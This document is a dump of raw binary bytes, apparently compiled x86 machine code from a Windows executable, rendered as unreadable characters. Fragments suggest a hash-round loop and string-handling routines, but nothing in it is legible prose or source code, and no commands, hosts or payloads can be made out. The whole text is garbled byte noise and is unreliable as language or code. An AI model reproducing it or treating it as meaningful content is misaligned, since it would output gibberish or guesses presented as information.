���|$$3݋������|$3݋l$$��l$0#��l$�|$�|$$#�|$��l$�\$��|$ �ދ�������ߋ��������3ߋ��������$�   3ߋ�3��#�3���-��B ���D$ �|$�؋�������ߋ�����
�3ߋ���������l$3ߋ|$$�#��l$$#���l$�\$��|$(�|$0��ߋ�����݋�|$0�����|$03݋�������3݋l$03�#���$�   3����-��B ���L$(�|$�ً�������ߋ�����
���3ߋ�������l$$3ߋ��#���#���l$�\$��|$�|$��|$�ߋ�����݋������|$3݋�������3݋l$03��l$#���$�   �3���-��B ���T$�|$�ڋ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$��|$,�|$$��ߋ�����݋�|$$�����|$$3݋������|$03݋l$3��l$$#��l$03���$�   ���-��B ���t$,�|$�ދ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$�É|$�؋�������ߋ��������3ߋ�������l$$3ߋ|$3��l$#�3���$�   ���B ��l$0���|$�|$�������������
�3�|$������ߋ�3�\$��l$,��#�#�\$�|$��l$,���\$ˉ|$0������������������3��������\$$3��3�#�3���$�   ݋l$����B ���|$�|$0�������������
ߋ|$03������ߋ|$3�\$0��l$,�l$#�#�\$�|$��l$,���\$Ӊ|$�ڋ�����ߋ����������3ߋ��������$�   3ߋ�3��\$$#�3���-��B ���|$�|$�ߋ�����݋�����
�|$3݋������|$03݋l$��l$#��l$0�|$�|$#�|$��l$�\$��|$$�ދ�������ߋ��������3ߋ��������$�   3ߋ�3��#�3���-��B ���D$$�|$�؋�������ߋ�����
���3ߋ�������l$03ߋ|$�#��l$#���l$�\$��|$ �|$��ߋ�����݋�|$�����|$3݋�������3݋l$3�#��-��B 3�����$�   ���L$ �|$�ً�����ߋ�������
���3ߋ�������l$3ߋ��#���#���l$�\$��|$(�|$0��ߋ�����݋�|$0�����|$03݋�������3݋l$3��l$0#��-��B 3�����$�   ���T$(�|$�ڋ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$��|$�|$��ߋ�����݋�|$�����|$3݋������|$3݋l$03��l$#��l$3��-��B ����$�   ���t$�|$�ދ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$�É|$,�؋�������ߋ��������3ߋ�������l$3ߋ|$03��l$0#�3��-��B 닜$�   ��l$���|$�|$,�������������
ߋ|$,3������ߋ�3�\$,��l$��#�#�\$�|$��l$���\$ˉ|$������������������3��������\$3��3�#�3����B ݋l$0���$�   ���|$�|$�������������
ߋ|$3������ߋ|$,3�\$��l$(�l$,#�#�\$�|$��l$(���\$Ӊ|$0�ڋ�����ߋ����������3ߋ�������-ĴB 3ߋ�3��\$#�3����$�   ���|$�|$0�ߋ�����݋�����
�|$03݋������|$3݋l$0��l$,#��l$�|$�|$0#�|$��l$�\$��|$�ދ�������ߋ��������3ߋ�������-ȴB 3ߋ�3��#�3����$�   ���D$�|$�؋�������ߋ�����
���3ߋ�������l$3ߋ|$0�#��l$0#���l$�\$��|$$�|$,��ߋ�����݉|$,�������|$,3݋�������3݋l$,3�#��-̴B �3����$�   ���L$$�|$�ً�������ߋ�����
���3ߋ�������l$03ߋ��#���#���l$�\$��|$ �|$��ߋ�����݋�|$�����|$3݋�������3݋l$,3��l$#��-дB 3�����$�   ���T$ �|$�ڋ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$��|$(�|$0��ߋ�����݋�|$0�����|$03݋������|$,3݋l$3��l$0#��l$,3��-ԴB ����$�   ���t$(�|$�ދ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$�É|$�؋�������ߋ��������3ߋ�������l$03ߋ|$3��l$#�3��-شB 닜$�   ��l$,���|$�|$�������������
ߋ|$3�������3�\$��#��#���\$���\$ˉ|$,������������������3��������\$03��3�#�3��ܴB ݋l$���$�   ���|$�|$,�������������
ߋ|$,3������ߋ|$3�\$,��l$(�l$#�#�\$�|$��l$(���\$Ӊ|$�ڋ�����ߋ����������3ߋ�������-�B 3ߋ�3��#�3����$�   �\$0���|$�|$�ߋ�����݋���
���|$3݋������|$,3݋l$��l$#��l$,�|$(�|$#�|$(��l$�\$��|$0�ދ�������ߋ��������3ߋ�������-�B 3ߋ�3��#�3����$�   ���D$0�|$�؋�������ߋ�����
���3ߋ�������l$,3ߋ|$�#��l$#���l$�\$��|$�|$��ߋ�����݋�|$�����|$3݋�������3݋l$3�#��-�B 3�����$�   ���L$�|$�ً�������ߋ�����
���3ߋ�������l$3ߋ��#���#���l$�\$��|$$�|$,��߉|$,������݋������|$,3݋������|$3݋l$,3�#��-�B �3����$�   ���T$$�|$�ڋ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$��|$ �|$��ߋ�����݋�|$�����|$3݋������|$3݋l$,3��l$#��l$3��-�B ����$�   ���t$ �|$�ދ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$�É|$(�؋�������ߋ��������3ߋ�������l$3ߋ|$,3��l$,#�3��-��B 닜$�   ��l$���|$�|$(�������������
ߋ|$(3������ߋ�3�\$(��l$0��#�#�\$�|$��l$0���\$ˉ|$������������������3��������\$3��3�#�3����B ݋l$,���$   ���|$�|$�������������
ߋ|$3������ߋ|$3�\$(��l$0�l$#�#�\$�|$,��l$0���|$,T$�ڋ�����ߋ����������3ߋ��������$  3ߋ�3��\$#�3���-��B ���|$�|$,�ߋ�����݋�����
�|$,3݋������|$3݋l$,��l$(#��l$�|$�|$,#�|$��l$�\$��|$�ދ�������ߋ��������3ߋ��������$  3ߋ��3�#�3���- �B ���D$�|$�؋�������ߋ�����
���3ߋ�������l$3ߋ|$,�#��l$,#���l$�\$��|$0�|$(��ߋ�����݋�|$(�����|$(3݋�������3݋l$(3�#���$  3����-�B ���L$0�|$�ً�����ߋ�������
���3ߋ�������l$,3ߋ��#���#���l$�\$��|$�|$��ߋ�����݋�|$�����|$3݋�������3݋l$(3��l$#���$  3����-�B ���T$�|$�ڋ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$���\$�|$$�|$,��ߋ�����݋�|$,�����|$,3݋������|$3݋l$(3��l$,#��l$(3���$  ���-�B ���t$$�|$�ދ�������ߋ�����
���3ߋ��������3ߋ��#�#���l$�\$�É|$ �؋�������ߋ��������3ߋ�������l$,3ߋ|$3��l$#�3���$  ��B ��l$(���|$�|$ �������������
ߋ|$ 3������ߋ�3�\$ ��l$(��#�#�\$�|$��l$(���\$ˉ|$(������������������3��������\$,3��3�#�3���$  ݋l$���B ���|$�|$(��������������
ߋ|$(3������ߋ|$ 3�\$(��l$�l$ #�#�\$�|$��l$���\$Ӊ|$�ڋ�����ߋ����������3ߋ��������$   3ߋ�3��\$,#�3���-�B ���|$�|$�ߋ�����݋�����
�|$3݋������|$3݋l$(��l$ #��l$�|$�|$(#�|$��l$�\$��|$,�ދ�������ߋ��������3ߋ��������$$  3ߋ�3��#�3���-�B ���D$,�|$�؋�������ߋ�����
���3ߋ�������l$(3ߋ|$�#��l$#���l$�\$��|$�|$ ��ߋ�����݋�|$ �����|$ 3݋�������3݋l$ 3�#���$(  �3���- �B ���L$�|$�ً�������ߋ�����
���3ߋ�������l$3ߋ��#���#���l$�\$��|$0�|$(��ߋ�����݋�|$(�����|$(3݋�������3݋l$ 3��l$(#���$,  3����-$�B ���T$0�|$���������������
���3���������3���#�#���\$�����T$Ӊ|$�ڋ�����ߋ����������3ߋ�������l$(3ߋ|$ 3��l$ #�3���$0  ���-(�B ���|$�|$���������������
��3�������\$03��#���|$#����݋����������؉t$$�������3��������\$(3��3�#�3���$4  ݋-,�B ��\$ �����މ|$������ߋ�����
���3ߋ�������l$03ߋ|$�#��l$#���l$�\$�ˉ|$ �ً�������ߋ������3ߋ���������-0�B 3ߋ�3��\$(#�3����$8  ���|$�|$ �ߋ�����݋�����
�|$ 3݋������|$ 3݋��|$#�|$ #��t$4�\$�t$8�.�n�~�n�l$$��l$�~�~��~�~��\$0��~�~��NȋF~�N�F_^][��,  Ð��   �   ��������TC �%$uB �����h�/A ��  YÐ�����TC �%uB ������   �   ��������TC �%uB �����h�/A �d�  YÐ�����TC �%uB ������   �   ��������TC �V3  ������h 0A �$�  YÐ�����TC �v3  �������   ��������������TC �TC ��TC ��TC ��TC     ��TC "Ð��������   �&   ������jh��B ��TC �O(  Ð�������������h�0A ��  YÐ�����TC �.  ������V�t$��Wt�=�uB �P�׃���tFu���_^Ð�����������D$V��Wt&�T$�t$���t��t
��;�u@���;�t@u�_^Ð�������������T$S�\$3�VW��u�   3���t'�|$�
��t;�s��t��;�u��u���3�@Bu�_^[Ð��������S�\$UV�t$W��u�   3҅�t5�|$�L$���t;�s��t��;�u��u���3҈AFu�_^]� [ËD$_^]�  [Ð����D$SUV3�W����t:�\$�-�uB ���t*�L$��t��;�u��u�����PS3��Ճ���uGuЋ�_^][Ð��������������QSUV�t$W3�3���t[�L$$�-�uB ���tK;|$ }E��t��;�u��u���/�L$3��R�Ջ��P�T$�ՋL$��;�u�L$$�-�uB GFu�;|$ u_^]3�[YËT$3Ɋ�T$�_:�^��I]��[I��YÐ���SUV�t$W3���t:�\$ �l$���t,��t��;�u��u����L$SUQV3��"�������tFu΋�_^][Ð�D$SUV��WtI�t$�|$��uB ��t;�s�P�Ӄ���tFu�G���t$;�s �O�Q�Ӄ���tO�G���u���|$�t$��+ޅ�~Q�l$$��t&WVU�����L$(��P�F�  WVUP�������_^][ËL$�SR�(�  �ˋ������ʃ��� _^][Ð����j�h�NB d�    Pd�%    ��SV��t$�D$   �c   �F P�D$��  3ۉ^ �^$�^(�FP�D$��  ���N�^�^�^�\$��  ���D$�����}�  �L$^[d�    ��Ð�����QSUV��W3ۍn�E��t3�M+���;�s'�V�<���t���@���W��  �F����    C�ƋM�}��;�t������;�u�E��PW�4+  �}3ۋF ��t2�N$+���;�s&�Ћ<���t���\   W��  �F ����    C�ǋV$�N ��;�t�8���9��;�u�V$�N$_^]�T$[YËF$�N$_^]�D$[YÐ�����������j�h�NB d�    Pd�%    QV��t$�N�D$    �I�  ���D$�����:�  �L$^d�    ��Ð���j�h+OB d�    Pd�%    ��SUV�t$(��W�L$��  �\$0�> �}  V������������j  �<>��  </��  h�9C W� vB �������V  j��  ����l$3�;�D$$t����  �M�D$$�{�  �ŋl$�D$,�h�D$,j j PVW�D$8���������E$���M�T$,RjP��)  V������������   �>=��   FV�������������   �/��"t��'tj\h�9C W������
Gj\UW������K������D$0�D$,�T$0Q��RPVW�����C����t?�K��t8�T$,�BP�D$P�&  �L$,P���D$(   ��  �L$�D$$������  ��"t��'uF���z���3��L$_^][d�    ��� �C��u�T$�C�{�C   ���Ph�9C S�=�  ��뺋��j�h[OB d�    Pd�%    ��SUV�t$(��W�L$��  �\$4�> ��  V�������������  ;|$0�Z  h�9C W� vB �������E  j��  ����l$3�;�D$$t����  �M�D$$��  �ŋl$�D$,�h�D$,j j PVW�D$8���������E$���M�T$,RjP��'  V�"�����������   �>=��   FV������������   �/��"t��'tj\h�9C W������
Gj\UW�����K������D$4�D$,�T$4Q��RPVW�����C����t?�K��t8�T$,�BP�D$P�$  �L$,P���D$(   ��  �L$�D$$������  ��"t��'uF��������1���/�C��u&�T$�C�{�C   ���Ph�9C S�V�  ��3��L$_^][d�    ��� ��������d�    j�h�OB P�D$d�%    ��S3�U;�W��t�@�3��|$$Pjh\�B W�������;ÉD$u_]3�[�L$d�    ��� �E0V;��   j4��  �����t$;�\$ t?����  �N�D$ ��  �D$,�L$,�F�^�^�^�N�^ �^$�^(�^�^0�^,�3��t$(�n�D$(�U0�wh�9C �P0�L$,V�D$(�����A,   � vB �T$0S��SRWV�f����D$H�L$,��PQ�L$0W������u0���F�V+Ћ�������   �N;�t+�������w�   ����#  ��݋�y3���P��  �N����UWQ����$  �T$(��RjP�D$8�'  �D$,�N��PQW����$  �V�FRP���$  �NQ�D�  �T� ���ΉV�#  �D��n�F�   ��+�����sD�W��RPW�w$  �F�L$(��Q+׹   ��+�QP���('  �N��;�tI�T$(���;�u��:PP�����P�3$  �N�A�;�t�P�����;ǉu�G;�t�L$(���;�u�F�T$�L$^_]�B[d�    ��� ������j�h�OB d�    Pd�%    Q�D$SW����t�@�3��\$Pjhh�B S�T������D$��u_[�L$d�    ��� U�o��Vu�O0�G0��t�����  j4����  �����t$���D$    tA�����  �N�D$���  �D$(�F3��F�F�F�L$(�N�F �F$�F(�F�F0�F,�3��t$(�~�D$(�W0h�9C �D$ �����P0�L$,�A,   �L$,��  �T$(�D$$j ��j RPS�����E�M�u+�����������   �N��t+�������w�   ���c!  ����y3���    R��  ���؋F��SWP�Z"  �L$(�D$QjP���%  �T$�F����RPW�3"  �N�VQR���"  �FP��  �����N����   �T��^�V�   ��+�����sB�W��RPW��!  �F�L$(��Q+׹   ��+�QP���$  �F;�tI�T$(���;�u��:PP�����P�!  �N�A�;�t�P�����;ǉu�G;�t�L$(���;�u�F�T$$�L$^]_�B[d�    ��� ����j�h�OB d�    Pd�%    Q�D$SW����t�@�3��\$Pjhx�B S��������D$��u_[�L$d�    ��� U�o��Vu�O0�G0��t�����  j4��	�{�  �����t$���D$    tA���c�  �N�D$�V�  �D$(�F3��F�F�F�L$(�N�F �F$�F(�F�F0�F,�3��t$(�~�D$(�W0h�9C �D$ �����P0�L$,�A,   �L$,��  �T$(�D$$j ��j RPS�.����E�M�u+�����������   �N��t+�������w�   ����  ����y3���    R��  ���؋F��SWP��  �L$(�D$QjP���"  �T$�F����RPW�  �N�VQR���  �FP��  �����N���[  �T��^�V�   ��+�����sB�W��RPW�S  �F�L$(��Q+׹   ��+�QP���"  �F;�tI�T$(���;�u��:PP�����P�  �N�A�;�t�P�����;ǉu�G;�t�L$(���;�u�F�T$$�L$^]_�B[d�    ��� �����L$SUV�t$W���� �   �l$��uB ��D$����   V�D$  ������jhX�B V���Ӄ���u�T$ ��RV�������;�t�D$V�������jh`�B V���Ӄ���u+�D$ ��PV�O������E��t�x,t;�u`�	;�t�D$V������j	hl�B V���Ӄ���u+�L$ QV���������E��t�x,t;�u(�	;�t�D$���(�����_^][ËT$��_^]�[ËD$� ��_^][�j�hPB d�    Pd�%    ��SUVW���|$������D$8j<P��uB ��3ۃ�;�u3��S  �~/u���F  �l$<�L$UVQW�\$#�x�����;�t��8\$t���  Fh\:C V� vB �T$S��SRWV�����L$0��UW������;���  �?/u7�GG<>u�G��  8]uhD:C �M�E�}�E   ��  3��  �D$�L$<���D$� P�v�  �L$<�\$0���  �L$<��  �D$<9X�thLRC P�DuB ���\$8��u�D$8�L$<�D$0������  8\$8��   Gj\j<W���������;�u68]��  �L$�E�}�E   ���Rh$:C U���  ��3���  �E �M�D$8�T$8�D$QRPVW������E��:Ë�t9�M;�t2�t$�T$8�PR��  P���D$4   �g�  �L$8�D$0�����N�  ;���  8�  j4�-�  �����t$8;��D$0   t?����  �N�D$0��  �D$8�L$8�F�^�^�^�N�^ �^$�^(�^�^0�^,�3��D$�t$�F�L$�P0U�Q0�P,�D$W�D$8�����P,�L$ �Y����L$���9Z�t�D$�T$Rj�H�@P�  �;ˋ�t����V�V�  ��;���  �:���   �G:���   ��<��   </��   ��W��������;��r  �L$<�"�  h�9C W�D$8   � vB ����;��_  S�D$@SPVW�C����L$(�T$P�PR�DuB �����t  �E	�~:��|  �D$0�����L$<��   �D$�L$��� P���  �L$�D$0   �!�  �L$��  �D$9X�thLRC P�DuB ���\$8��u�D$8�L$�D$0�����Z�  8\$8��   �?<��   j\j<W�G�������;��&  �M �U�L$ �L$�D$ RP�APVW�Z����E��:Ë�t=�M;�t6�T$�B�rP�D$(P�B  P���D$4   ���  �D$0�����L$$���  ;��y����ǋL$(_^][d�    ��$� 8]u&�L$�E�}�E   ���Rh:C U��  ���L$<�D$0�����l�  3�뫍L$<F�D$0�����V�  ���8]u+�L$�D$<�E�}�E   �PR��h�9C U�3�  ���L$<�D$0������  3��M���8]u&�D$�E�}�E   ���Qh:C U���  ��3�������j�h�PB d�    Pd�%    ��   ��tB SV��W�L$x�D$    �D$(��tB ��tB �   �L$x�\$j j�T$4j R�L$8Ǆ$�      ��tB j�L$0Ǆ$�      ��tB �D$(��tB �H�T(��$�   Ǆ$�      �G��t(�O��t!�FP�D$P�  �   �\$Ƅ$�   ��F��G�6h�0C PQPhd:C �L$<V�5�tB Q�փ�P�֋=�tB ��P�׃�P�փ�P�׃�P�փ�Ǆ$�      ��t����L$�\$��  �T$�L$(R��tB �@3�;�Ƅ$�   u�,tB ��$�   P����  ���\$�D$;�t�H��@���t
<�t�Ȉ�	Q��  ���L$(�D$x�|$�|$�|$ �Q�D$��tB �D(��tB �L$,Ǆ$�      �L$$�T$,�L$,Ƅ$�   ��tB ��tB �L$`�D$,��tB �L$(��tB Ƅ$�    �Q�D(��tB �L$x�L$x��tB ��$�   ��_^[d�    �Ĭ   � ���������������j�h�QB d�    Pd�%    ��   ��tB SUV��W�L$x�D$    �D$(��tB ��tB �D$   �L$xj j�T$4j R�L$8Ǆ$�      ��tB j�L$0Ǆ$�      ��tB �D$(��tB �H�T(��$�   ��tB �-�tB Ǆ$�      ��t;�? t6�D$(hp:C P�ՋG��3ۅ�~�L$(j	Q��tB �G��C;�|��tB �F,����   3ۋF��tC�V+���;�s7�L$WQ�������� �T$(PRƄ$�   �Ճ��L$Ƅ$�   �.�  C붍D$�L$(P��tB �@�   ����$�   u�,tB ��$�   P����  �\$j�L$Ƅ$�   ��tB �L$xƄ$�    ��tB ��tB �L$x�L$x��tB ���  ���  ��T$(PhX�B R�Ճ�P�ՋF ����t�N$+�������t�T$(j R�Ӄ�3ۋF ��tC�N$+���;�s7���T$WR�v���� Ƅ$�   P�D$,P�Ճ��L$Ƅ$�   �&�  C붍L$(h\�B Q�Ճ��T$�L$(R��tB �@Ƅ$�   ��u�,tB ��$�   P����  j�L$�D$   Ƅ$�   ��tB �L$xƄ$�    ��tB ��tB �L$x�D$x��tB ���i  ����   �v�L$(Vh`�B Q�Ճ�P�ՍT$0hh�B R�Ճ��D$�L$(P��tB �@Ƅ$�   ��u�,tB ��$�   P���`�  j�L$�D$   Ƅ$�   ��tB �T$(�L$x�L$��tB �B�L(�L$,Ǆ$�   	   ��tB �T$(��tB Ƅ$�    �B�L(�L$x��tB ���  ����   �v�T$(Vhl�B R�Ճ�P�ՍD$0hx�B P�Ճ��L$Q�L$,��tB �@Ƅ$�   
��u�,tB ��$�   P����  j�L$�D$   Ƅ$�   ��tB �D$(�T$x�T$��tB �H�T(�L$,Ǆ$�      ��tB �D$(��tB Ƅ$�    �H�T(�L$x��tB ����  �P�D$,j<P�Ӄ�P�ՋF ����t�N$+�������t�T$(j R�Ӄ�3ۋF ��tC�N$+���;�s7���T$WR������ Ƅ$�   P�D$,P�Ճ��L$Ƅ$�   �t�  C붋F��t�N+�������u�V�B���u�D$(hl:C P�Ճ���  �L$(j>Q��tB ����t�? t�F��t�V+�������t�G3ۋF��tC�N+���;�s7���T$WR�v���� Ƅ$�   P�D$,P�Ճ��L$Ƅ$�   ���  C붋N�A�����   ��tI�? tD�F��t=�V+�������t0�D$(hp:C P�ՋG��3ۅ�~�L$(j	Q��tB �G��C;�|�G��t'�O��t �F�T$PR�V  �D$   Ƅ$�   ��F� P�D$,P�ՊD$���Ǆ$�      t�D$�L$$��D$��  ��tK�? tF�F��t?�N+�������t2�T$(hp:C R�ՋG��3�H��~�L$(j	Q��tB �W��CJ;�|�j>P�D$0hh:C P�Ճ�P�Ճ�P��tB ����t�? t�F��t�N+�������t�O�T$�L$(R��tB �@Ƅ$�   ��u�,tB ��$�   P���e�  �T$�D$3��;ŉT$t�H��@���t
<�t�Ȉ�	Q���  ���L$(�D$x�l$�l$ �l$$�Q��$�   ��tB �D(�D$p��tB �Ǆ$�      �L$,t�T$8�P��  ���L$p�|$`��tB ���;��l$h�L$p�D$,t;�L$�<tB �G;�v	���sH�G�w�L$�����#��DtB ;�t�j����D$(��tB Ƅ$�    �H�T(��tB �L$x�D$x��tB �Ë�$�   _^][d�    �Ĭ   � j�hwRB d�    Pd�%    ��   ��tB SUVW��3��L$|�|$�D$,��sB �D$   Wj�L$8WQ�L$<Ǆ$�      ��tB j�L$4Ǆ$�      ��tB �T$,��tB �B�L,�F,Ǆ$�      ��u_��$�   ��tB �F���\  �V+���;��L  �L$UQ���/���� �T$,PRƄ$�   �Ӄ��L$Ƅ$�   ��  G뮃��  ���  ��u�v�D$,VP��tB ����   ;���   �F;�t�N+�������u�V9z���   �-�tB �   �F��tF�N+���;�s:���T$h�TC R����� ��$�   P�D$0P�Ճ��L$Ƅ$�   �q�  G볋�$�   �H��t#�H��t�v�T$VR�U	  �\$Ƅ$�   ��F� P�D$0P�ՊD$���Ǆ$�      t�D$�L$$��D$��  �L$Q�L$0��tB �@3�;�Ƅ$�   u�,tB ��$�   P�����  �L$�D$;�t�H��@���t
<�t�Ȉ�	Q��  ���D$,�T$|�|$�|$ �|$$�H�T$��tB �T,��tB �D$0Ǆ$�      �D$(�L$0�L$0Ƅ$�   	��tB ��tB �L$d�T$0��tB �D$,��tB Ƅ$�    �H�T,��tB �L$|�D$|��tB ��$�   ��_^][d�    �Ĭ   � ��SU�l$VW��3ۋG ��t2�O$+���;�s&�Ћ4���t�UP�DuB ����tC�Ћ�_^][� _^]3�[� ���D$P������t�@� 3�� �������j�h�RB d�    Pd�%    ���D$(SUV��3�3�W�T$�D$�T$�L$�T$ �\$8�-DuB �T$,3��F;�tB�V+���;�s6�����D$8t"� SP�Ճ���u�T$�L$8QjR�L$ �v	  �L$G3�뷋t$4�D$��D$��t+�������}3���    Q��  �T$ �L$��;ʉFt��t�9�8����;�u�L$Q�F�F�q�  �L$(����d�    _^][�� � ���SU�l$VW��3ۋG��t2�O+���;�s&�Ћ4���t�UP�DuB ����tC�Ћ�_^][� _^]3�[� ��j�h�RB d�    Pd�%    Q�D$SVP�D$    ������t�L$$�T$$QR��������   �\$�hLRC �L$$���  �   �\$�t$P�Ή\$���  �����D$   t����L$ �\$��  ���D$    t����L$$�\$�x�  �L$��^[d�    ��� ��������������D$P�������t�L$Q���F���� 3�� ���������������D$�T$PR�������t�@� 3�� ��j�hSB d�    Pd�%    ���D$ UV��3�t$��n�n�n�D$(�l$;���  S�\$(W�\$0�D$,�3�F�N+ȋ�������   �V;�t��+�����w�   ;�u3��+����;ŉD$}3���P�Y�  �n��;�D$��tUS�	  ������;�u�T$0��RjS�
	  �F��SPW���  �N�VQR���K  �FP���  �D$�|$��ǃ��ΉF��  �\$0@��ǉ~�F��   ��+�����sV�OQPW���J  �F�   ��S+���+�QP���  �F;���   �Ӌσ��*;��)�j�i�j�i�R�Qu��k�H�PP�L$Q����  �N�A�;�t(�����Ћ�;ǋ*�+�j�k�j�k�R�Su܋\$0�G;�t!�ˋ׃��);��*�i�j�i�j�I�Ju߃F�D$,��H�\$0�D$,�=���_��[^]�L$d�    ��� �L$��^]d�    ��� SU�l$VW3���3ۋN��tQ�F+���;�vEw����  �F�;�tG���ӋF��t�V+���;�w���  �N��_^��]�[� _^]3�[� �SUVW3��3ۋO��tx�G+���;�vlw���z  �G�D��t'�t$+����t�@:�u
��u�E��뻅�t�8 tE��묋G��t�O+���;�w���(  �O��_^��]�[� _^]3�[� ��������������SV�t$3�W����t���t��P��F�������tC��u�_��^[� ���������������D$SU�l$V�t$��W�(�����L$t,�> t';|$s!V���������t���H���F�G��u�� ��_+�^][� ��������D$S��U�l$�L$VW�)�������T$t6���t0;t$s*��P��������t@��t���t�F@u����FGuʋ�� _+�^][� �����������j�h?SB d�    Pd�%    ��S��UV�L$�D$    �r�  �l$(�D$   ��t+W�����3����I��L$�FP�^�  ��_t
VPU��������t$$�L$Q���A�  �D$   �L$�D$ ��  �L$��^][d�    ��� �����������j�hoSB d�    Pd�%    ��U��VW�L$�D$    ���  �t$(�   ���|$tMV��������Ѕ�uV�t$(�����  �|$�E�����3����I���<A�OQ�L$��  ��t
WPV���T����t$$�T$R���n�  �D$   �L$�D$ �D�  �L$��_^]d�    ��� ��������QV��FP�D$���  ��3��F�F�F^YÐ��������������Q��u3�ËA+���Ð�������������Q��u3�ËA+���Ð������������j�h�SB d�    Pd�%    ��4�D$SUW�D$��:C ���3�3�j���I�\$��L$U�\$$�\$(��sB ��t&�|$�͋�V��:C ���ʃ��D$�l$ ^�(�L$�\$HQ�L$(�D$LRC ��uB �T$S�L$4�D$L�T$4��tB ��tB �T$�QSR�L$<��tB ��tB �L$$h0�B Q�\$P�D$,���  _][�������������� ��������������L$�T$;�t�D$V��t�1�0����;�u�^� �D$� ����SUVW�l$ ���|$�G�O+���;��  �W��t��+���;�r�ͅ�u3��+�������D$}3���    R��  �\$ �D$$�ȋG��;�t��t������;�u���v�t$$�Յ�t�>�8�|$��Ju��4�    ;ߍt��+�+�Å�t��
����;�u�t$�FP�D$(��  �T$$�D$�����N�N��u3��V��_���F^][��� �F�V+�_��ō��F^][��� �T$��+���;�sn��    ;Ѝ4t��+˅�t�9�>�|$����;�u�G�t$$��+���+�t��t����Mu�O��;�t����;�u��GÉG_^][��� ��vT���ȋ�+�;�t��t������;�u�O��+�;�t�p�����;1u�*��;�t�T$$�2�0��;�u�o_^][��� ��������L$�T$;�t5�D$SVW��t������^�_�^�_�v�w����;�u�_^[� �D$� ���������D$��v4�T$SV�ȋD$W��t������^�_�^�_�v�w��Iu�_^[� ��D$��v�T$�ȋD$V��t�2�0��Iu�^� ������������D$��t�L$���Q�P�Q�P�I�HÐ������������V��N�u�  3��F��F	�F�F�F�F�F�TC �F\��^Ð�����������������>�  ��������j�h�SB d�    Pd�%    ��S��VW�s�Ήt$��  3��N�|$���  �D$�L$�F�~�~�~�N�L$�~ �~$�~(�~�~0�~,_�еB ��^[d�    ��Ð���V���   �D$t	V��  ����^� ���еB ��������U��j�h�SB d�    Pd�%    ���ESVW�e�3�h�5C �M�P�}�}��`uB ����;���   �luB jWV��V�huB j j V���ӍOQ��  �� ��VWjS�\uB V� �LuB �����3����IQS�]�����E@P���  �������3����U���RIVQS�u��h]���E�������� 3����+��E�ы���P���ʃ���j�  ����t%�M�h�TC S��������t�E�   S�A�  ���M�E�_^d�    [��]� �E�    �feA Ð������U��j�h�SB d�    Pd�%    ��0  SVW3��e�VVV�M�Vjh`1C �Mȉu��U�  �   3�������ƅ���� �M�u����  �M��E����  �E�M�P�E����  �MjQ�M���  � hX1C P�puB ���M������  ��thX1C V�M���  �U�VVh �jR�MȈ]���  �����o  �M�J�  �E��������h   Q���P<��wc����RT��t	�j���P�M�]���  �M��E�   �M�  �E��E��H�����   �U�h�TC P�Z��������t(�E�   �   ������Ƅ���� Q�M���  �j����U�����3����IQR�:[�����E���~J@P��  �U�����E�P�����3����IVQR�[������h�TC V�	���3�V�����M��-�  ���M��E�   �=�  �M��E� �1�  �M��E������b�  �E�M�d�    _^[��]� �E�    �zgA ËM��1�  �M��5�  ��gA ÍM��E��ݿ  �M��E� �ѿ  �M��E�������  �M�_^3�d�    [��]� �������U��j�hTB d�    Pd�%    ���A��SV�P�W�҉e�u3��M�d�    _^[��]� �U�h�TC R�E�    �����h�:C �M��E��c�  �E�P�M�]���  �U�����3����IQR�`W�����E�@P���  �U���M��Q�����3����IVQR�X�����̉e�V��  �UQ�̉e�R�E���  �]��/������V蓿  ���M��E�覾  �M��E� 蚾  ��E    �;iA Ë}�M��_^d�    [��]� �������������j�hwTB d�    Pd�%    ��SV��W�t$�
����^83��ˉ|$�\$�&�  �K�D$��  �F@ �B �~D�~P�~L�~H�FT�B �~X�~d�~`�~\�FhصB �~l�~x�~t�~p�N|�D$�ӽ  ���   �D$�ý  �L$�ԵB ��_^[d�    ��Ð��������V���h   �D$t	V�o�  ����^� ��j�h�TB d�    Pd�%    QV��t$�N�D$    �Y�  ���D$�����J�  �L$^d�    ��Ð���j�hUB d�    Pd�%    ��SUVW���|$�ԵB ���   �D$    ���  �O|�D$ ��  �wh�t$�صB �^�D$ ��t&�F��H��t�h����*����Mu�FP落  ����xB �wT�t$��B �F�D$ ��t(�N�؋�I��t�i���z�  ��Mu�FP�I�  ����xB �w@�t$� �B �F�D$ ��t(�N�؋�I��t�i���������PMu�FP��  ����xB �w8�t$�N�D$ 	��  ���D$  ���  ���D$ �����V����L$_^][d�    ��Ð��V��W�F�~�H���u_3�^�W���   W����  _^Ð������U��j�hcUB d�    Pd�%    ��(S�M�MV3�W;Ήe���  �E�h(;C P�u�������E���EЅ��  �M�+���;���   �M��5�  �M��E��)�  �M��E���  �U�h$;C �E����i���P�M��&�  �E�h ;C ���P���P�M���  �M�h;C ���7���P�M����  �U�R�e*�����E�P�Y*������M܉e��Q�ω}�轻  �U��OR�E�譻  �E�OP�]�螻  �M��E���h�U  �M��E��o�  �M��E��c�  �M��E��W�  F������Mh;C ���������t:h$;C h;C �������}�P�O|�A�  h$;C h ;C �������P���   �$�  �UЋMԋ�;�t����R�˺  ���   �M�d�    _^[��]� ��mA ËM�_^3�d�    [��]� �j�hrVB d�    Pd�%    ���   S��$�   U3�V;�W�L$Pu3���	  �D$�l$�D$�l$�l$ �L$��$�   �L$8�l$<�l$@�l$D�T$�l$,�T$(�l$0�l$4h�;C ��Ƅ$�   �����L$\h�;C Q���������T$Ƅ$�   ;��  �F;�u3���~+����L$����;�w;�T$�F�NRPQ��  �L$(��QP�L$�������������T$���D$�   ��������L$����
